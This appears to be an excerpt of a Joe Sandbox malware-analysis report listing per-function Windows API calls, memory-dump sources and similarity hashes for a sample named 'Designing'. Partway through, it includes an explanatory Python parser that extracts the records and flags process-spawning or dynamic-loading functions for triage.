• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: f1bb4bd2a0107c7a14ec39227f29bbfb041570bc02b542281879b4c0882a0a2c
• Instruction ID: fd2166a5d0482cc7a7e46dc63c5b74e7d8e29e7c5e7cc7238d01c41f61c69fad
• Opcode Fuzzy Hash: f1bb4bd2a0107c7a14ec39227f29bbfb041570bc02b542281879b4c0882a0a2c
• Instruction Fuzzy Hash: 37014475A04718BFEB109BA69C49F5E7FB9EB44751F004065FA05F7290D6709C14CFA0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DA32AF
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00DA32B7
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DA32C2
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DA32CD
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00DA32D5
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00DA32DD
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 90098850e543f456708b52c910f0a6d38239a0d39b7e46b1fb987c998c07ff7c
• Instruction ID: a778db06aaf81f3304a031385f4f7b87b039be18d6e6a10a4e23344df3e3c30e
• Opcode Fuzzy Hash: 90098850e543f456708b52c910f0a6d38239a0d39b7e46b1fb987c998c07ff7c
• Instruction Fuzzy Hash: BA016CB0901B597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E0F447
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E0F45D
• GetWindowThreadProcessId.USER32(?,?), ref: 00E0F46C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E0F47B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E0F485
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E0F48C
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 374f110fc5483562bc9b1dd0de7c3bb4403a09db36d4cef275cbaa99f39bd7f3
• Instruction ID: f87731c0dd19426fe1166a884eb1fae151b202bb13746e33db956ac7a166f99e
• Opcode Fuzzy Hash: 374f110fc5483562bc9b1dd0de7c3bb4403a09db36d4cef275cbaa99f39bd7f3
• Instruction Fuzzy Hash: 32F0177224515CBFE7215B63AC0EEEB3E7CEBC6B11F000059FA11E209097A06A45D6B5
APIs
• GetClientRect.USER32(?), ref: 00DE34EF
• SendMessageW.USER32(?,00001328,00000000,?), ref: 00DE3506
• GetWindowDC.USER32(?), ref: 00DE3512
• GetPixel.GDI32(00000000,?,?), ref: 00DE3521
• ReleaseDC.USER32(?,00000000), ref: 00DE3533
• GetSysColor.USER32(00000005), ref: 00DE354D
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ClientColorMessagePixelRectReleaseSendWindow
• String ID:
• API String ID: 272304278-0
• Opcode ID: b93a9dfa871bf5d9b86540b92e0960778b337dc15191858f965219bd653df47c
• Instruction ID: e9ae3010b04d6e81a75c368f212e3c7fdc5e562008c313fdf7d0e50af3fd0dc2
• Opcode Fuzzy Hash: b93a9dfa871bf5d9b86540b92e0960778b337dc15191858f965219bd653df47c
• Instruction Fuzzy Hash: 69014B31504209FFDB516F66EC0DBF97FB1FB04321F550560FA2AA22A0CB315E55AB10
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E021CC
• UnloadUserProfile.USERENV(?,?), ref: 00E021D8
• CloseHandle.KERNEL32(?), ref: 00E021E1
• CloseHandle.KERNEL32(?), ref: 00E021E9
• GetProcessHeap.KERNEL32(00000000,?), ref: 00E021F2
• HeapFree.KERNEL32(00000000), ref: 00E021F9
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 71894c2dfd9480b88a85235999fe544f7b2603466cd7948baaaa0d50c9aac245
• Instruction ID: b65695fe9496dd353b1a83995f3f060cb28a7e586a2055fee2436f4fa97c78aa
• Opcode Fuzzy Hash: 71894c2dfd9480b88a85235999fe544f7b2603466cd7948baaaa0d50c9aac245
• Instruction Fuzzy Hash: D8E0E576008109BFDB011FA2FC0C94ABF39FF49322B114221F225E2070CB329834DB50
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 00E2B903
  • Part of subcall function 00DA41EA: _wcslen.LIBCMT ref: 00DA41EF
• GetProcessId.KERNEL32(00000000), ref: 00E2B998
• CloseHandle.KERNEL32(00000000), ref: 00E2B9C7
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: CloseExecuteHandleProcessShell_wcslen
• String ID: <$@
• API String ID: 146682121-1426351568
• Opcode ID: e323843a5d0a5e47ba848e4d4de8de5dc9d481eaf06e407c33da1f783c1ef6b4
• Instruction ID: 89787345ad20694a28b19972cb336d8d203d2e70ef14720bb993a7f565c16393
• Opcode Fuzzy Hash: e323843a5d0a5e47ba848e4d4de8de5dc9d481eaf06e407c33da1f783c1ef6b4
• Instruction Fuzzy Hash: 0D718C74A00225DFCB14EF54D494A9EBBF4FF08314F048499E85AAB352CB71EE45CBA0
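The per-function records in this part of the report all share one textual layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity). When a report has hundreds of them, the practical question is which functions deserve a look first: the record above, for example, calls ShellExecuteExW with cbSize 0x3C and then GetProcessId, so it launches something and keeps a handle to the child. The parser below is an added example, not code from Joe Sandbox or from this report: it reads that layout back into structured records, strips the "Download File" page-widget text from the Associated lines, and flags records whose direct calls spawn a process or load code at runtime. The sample input is copied from two records on this page and trimmed to the lines the parser uses; the API sets used for triage are chosen for this example, not taken from the report.

```python
"""Parse Joe Sandbox per-function records and flag the ones worth triaging first.
Added example; not part of Joe Sandbox or of the report it is shown with."""
import re
from dataclasses import dataclass, field

# Direct call:      • ShellExecuteExW.SHELL32(0000003C), ref: 00E2B903
# Call in a callee: • Part of subcall function 00DA41EA: _wcslen.LIBCMT ref: 00DA41EF
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Triage sets chosen for this example (assumption, not from the report).
PROCESS_SPAWN = {"ShellExecuteExW", "ShellExecuteW", "CreateProcessW", "CreateProcessA", "WinExec"}
DYNAMIC_LOAD = {"LoadLibraryW", "LoadLibraryA", "LoadLibraryExW", "GetProcAddress"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # (name, module, args, ref) direct calls
    subcalls: list = field(default_factory=list)  # (callee, name, module, ref) calls made by callees
    strings: list = field(default_factory=list)   # entries under "Strings" (often empty)
    meta: dict = field(default_factory=dict)      # Source File, Opcode ID, Instruction ID, ...


def parse_records(text):
    """Split report text into FunctionRecords; text before the first 'APIs' (a truncated record) is skipped."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:              # a string literally named like a section would be misread here
            if line == "APIs":            # every record begins with its APIs block
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if section == "APIs" and m:
            if m["callee"]:
                current.subcalls.append((m["callee"], m["name"], m["module"], m["ref"]))
            else:
                current.apis.append((m["name"], m["module"], m["args"] or "", m["ref"]))
            continue
        kv = KV_RE.match(line)
        if not kv:
            continue
        val = kv["val"].replace("Download File", "").strip()   # page-widget residue on Associated lines
        key = kv["key"].strip()
        if section == "Strings":
            current.strings.append(val)
        elif key == "Associated":
            current.meta.setdefault(key, []).append(val)
        else:
            current.meta.setdefault(key, val)
    return records


def triage(records):
    """Return (Instruction ID, [reasons]) for records whose direct calls spawn a process or load code."""
    hits = []
    for r in records:
        names = {a[0] for a in r.apis}
        reasons = []
        if names & PROCESS_SPAWN:
            reasons.append("process spawn: " + ", ".join(sorted(names & PROCESS_SPAWN)))
        if names & DYNAMIC_LOAD:
            reasons.append("dynamic code load: " + ", ".join(sorted(names & DYNAMIC_LOAD)))
        if reasons:
            hits.append((r.meta.get("Instruction ID", "?"), reasons))
    return hits


# Constructed sample: two records copied from this report page, trimmed.
SAMPLE = """
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 00E2B903
  • Part of subcall function 00DA41EA: _wcslen.LIBCMT ref: 00DA41EF
• GetProcessId.KERNEL32(00000000), ref: 00E2B998
• CloseHandle.KERNEL32(00000000), ref: 00E2B9C7
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Similarity
• API ID: CloseExecuteHandleProcessShell_wcslen
• String ID: <$@
• Instruction ID: 89787345ad20694a28b19972cb336d8d203d2e70ef14720bb993a7f565c16393
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E33A29
• LoadLibraryW.KERNEL32(?), ref: 00E33A30
• DestroyWindow.USER32(?), ref: 00E33A4D
Similarity
• String ID: SysAnimate32
• Instruction ID: dca80a9de56945b64f7c5887580f47ec40198dc7466fe200899a964fa91a455e
"""

if __name__ == "__main__":
    for iid, reasons in triage(parse_records(SAMPLE)):
        print(iid[:16], "; ".join(reasons))
```

Run it against a full report export and sort the hits by Instruction ID to de-duplicate functions that Joe Sandbox lists under several memory dumps; the Instruction ID, not the address, is the stable key across runs.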
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E348D1
• IsMenu.USER32(?), ref: 00E348E6
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E3492E
• DrawMenuBar.USER32 ref: 00E34941
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
• Opcode ID: 33a9452cab65e12914ce5f73038ab18626d4b36ede13a494b692f7d7d6d9c1c0
• Instruction ID: 95ff8d5ada32d0111438d1ba0e6f5880d416184aaae2560f7a3929205d95f42c
• Opcode Fuzzy Hash: 33a9452cab65e12914ce5f73038ab18626d4b36ede13a494b692f7d7d6d9c1c0
• Instruction Fuzzy Hash: 6D414CB5A0024AEFDB10CF51D888EAABBB5FF45328F045119F945A7390C730AD54CB60
APIs
  • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
  • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E027B3
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E027C6
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00E027F6
  • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessageSend$_wcslen$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2081771294-1403004172
• Opcode ID: bd0c50bb8ac4fde91bf5b569810e410ad676148bec27b6827d928b306175d46d
• Instruction ID: fbe7c32368847a66f1360b2cb0fade89df5d9726273971ff3930453d070e7fff
• Opcode Fuzzy Hash: bd0c50bb8ac4fde91bf5b569810e410ad676148bec27b6827d928b306175d46d
• Instruction Fuzzy Hash: B3213775900104BFDB09AB60DC49DFEBBB8DF56364B04912EF512B31E1CB38494A9670
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E33A29
• LoadLibraryW.KERNEL32(?), ref: 00E33A30
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E33A45
• DestroyWindow.USER32(?), ref: 00E33A4D
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessageSend$DestroyLibraryLoadWindow
• String ID: SysAnimate32
• API String ID: 3529120543-1011021900
• Opcode ID: 5e20c2bceb8247dd13459d280034ea0325c9ad579e8ea6ebec10c46400629ded
• Instruction ID: dca80a9de56945b64f7c5887580f47ec40198dc7466fe200899a964fa91a455e
• Opcode Fuzzy Hash: 5e20c2bceb8247dd13459d280034ea0325c9ad579e8ea6ebec10c46400629ded
• Instruction Fuzzy Hash: 61219D71600209AFEB109F74EC89FAB7BE9EB85368F106218FA91A21A0C771CD40D760
APIs
  • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
• GetCursorPos.USER32(?), ref: 00E39A5D
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E39A72
• GetCursorPos.USER32(?), ref: 00E39ABA
• DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00E39AF0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID: (
• API String ID: 2864067406-2063206799
• Opcode ID: b7290c6e50f7337ebcad9dacf4efb55d99eb4ec26bab39b73d5ca8607e39d1e2
• Instruction ID: b594bf36ec89ad464f12ca68e1add804ee22c7d64ee88630ef59199e3d2f4bd2
• Opcode Fuzzy Hash: b7290c6e50f7337ebcad9dacf4efb55d99eb4ec26bab39b73d5ca8607e39d1e2
• Instruction Fuzzy Hash: D321BF31600018EFCF258F95DC5DEFA7FB9EB49310F544259FA096B1A2D3B19950DB60
APIs
  • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
• DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00DA1AF4
• GetClientRect.USER32(?,?), ref: 00DE31F9
• GetCursorPos.USER32(?), ref: 00DE3203
• ScreenToClient.USER32(?,?), ref: 00DE320E
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID: (
• API String ID: 4127811313-2063206799
• Opcode ID: d39d16a06c84bd2067b93a98d4a654db606c388096c4d77ae2d641ea322dcd6c
• Instruction ID: bdb9d5df1cdae5951c8d3f857505c463b3f2eb719ac584d207d6b3d921e2ccf0
• Opcode Fuzzy Hash: d39d16a06c84bd2067b93a98d4a654db606c388096c4d77ae2d641ea322dcd6c
                                                                                                                                                                              • Instruction Fuzzy Hash: F3112835A01119AFDB10EFA9D94A9EE7BB8FB45350F100456E912A3140C771AA96CBB1
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00DC508E,?,?,00DC502E,?,00E698D8,0000000C,00DC5185,?,00000002), ref: 00DC50FD
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DC5110
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00DC508E,?,?,00DC502E,?,00E698D8,0000000C,00DC5185,?,00000002,00000000), ref: 00DC5133
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                              • Opcode ID: eaeaf8cd1eac2c0b444af347d76b0a846612eb37ef4b5bcf8b11f57fff3adf5a
                                                                                                                                                                              • Instruction ID: f8de642eb7680ab05125d2ca8b5312cde653c98ad77d7d6d68180fecb1649fb5
                                                                                                                                                                              • Opcode Fuzzy Hash: eaeaf8cd1eac2c0b444af347d76b0a846612eb37ef4b5bcf8b11f57fff3adf5a
                                                                                                                                                                              • Instruction Fuzzy Hash: 7BF03130A44609BFDB115F95EC4DB9DBFB5EF08752F040069F805B2160DB745994CAA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32 ref: 00DFE785
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DFE797
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00DFE7BD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                              • API String ID: 145871493-2590602151
                                                                                                                                                                              • Opcode ID: 057cc8900494d0f9a8464f520e04c8b6e24af503f0d0607587cea6ae3a53f8bd
                                                                                                                                                                              • Instruction ID: 42254fd1baaa66d95b53912f0871f6a87afc6bc3cdd0e4de202c6e4c12e9de55
                                                                                                                                                                              • Opcode Fuzzy Hash: 057cc8900494d0f9a8464f520e04c8b6e24af503f0d0607587cea6ae3a53f8bd
                                                                                                                                                                              • Instruction Fuzzy Hash: F6E0E57081661D9FD7216B215C88EBA27146F21B01B16C568FB42F6170DB30CD4886B4
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DA668B,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA664A
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DA665C
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00DA668B,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA666E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                              • API String ID: 145871493-3689287502
                                                                                                                                                                              • Opcode ID: 7c2490d001bb679d987a329c11afb608983ddf7f356742b9320777c155da9527
                                                                                                                                                                              • Instruction ID: afbfce797cf7f81155b1f8d2e2f13d767e9e9749163d263f65bb9870c08d99b2
                                                                                                                                                                              • Opcode Fuzzy Hash: 7c2490d001bb679d987a329c11afb608983ddf7f356742b9320777c155da9527
                                                                                                                                                                              • Instruction Fuzzy Hash: 1DE0CD356076325F93111726BC0CB5E69289F83F22B0D0155FD00F2140DFA4CC0580F4
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DE5657,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA6610
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DA6622
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00DE5657,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA6635
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
